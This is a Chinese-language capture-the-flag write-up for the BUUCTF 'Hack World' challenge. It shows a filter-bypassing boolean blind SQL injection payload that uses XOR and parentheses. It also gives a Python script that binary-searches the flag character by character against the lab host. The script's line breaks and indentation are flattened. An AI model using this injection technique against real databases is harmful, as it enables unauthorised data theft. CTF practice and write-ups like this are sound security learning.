Buuctf-web-[CISCN2019 華北賽區 Day2 Web1]Hack World
阿新 • • 發佈:2020-12-08
輸入1/1結果回顯了Hello, glzjin wants a girlfriend.
於是我們判斷它是數字型注入
試了半天發現他過濾了 or union and ,但好像沒有過濾()
使用bool(false)盲注,而且用到了異或,這東西相當於or的用法
0^0 //false
0^1 //true
於是構造payload:0^(ascii(substr((select(flag)from(flag)),1,1))>1)
發現這個東西不能注入太快要不然就不讓訪問好像,所以要注意節奏。
淘的大佬的二分指令碼
import requests import time url = "http://5630e1a6-6a3b-46f3-b10c-3c93b8f50376.node3.buuoj.cn/ /index.php" payload = { "id" : "" } result = "" for i in range(1,100): l = 33 r =130 mid = (l+r)>>1 while(l<r): payload["id"] = "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid) html = requests.post(url,data=payload) print(payload) if "Hello" in html.text: l = mid+1 else: r = mid mid = (l+r)>>1 if(chr(mid)==" "): break result = result + chr(mid) print(result) print("flag: " ,result)